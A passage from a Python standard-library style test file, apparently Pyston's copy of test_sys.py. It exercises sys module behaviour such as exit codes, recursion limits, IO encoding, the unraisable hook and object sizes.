with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_recursionlimit_fatalerror(self):
        # A fatal error occurs if the recursion limit is hit a second time while
        # recovering from the first recursion error.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@unittest.skipIf(True, "Pyston changes refcount of None")
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated",
"dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
        # has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
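# Worked example of the packing above: CPython 3.8.0 final has
# version == (3, 8, 0, 'final', 0), so
#   (3 << 24) | (8 << 16) | (0 << 8) | (0xF << 4) | 0 == 0x030800F0,
# which is exactly sys.implementation.hexversion (and sys.hexversion) for that release.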
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function takes no arguments
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# In theory the number of allocated blocks could exceed the total
# reference count (e.g. with many buffer objects sharing references),
# but that is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@test.support.requires_type_collecting
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
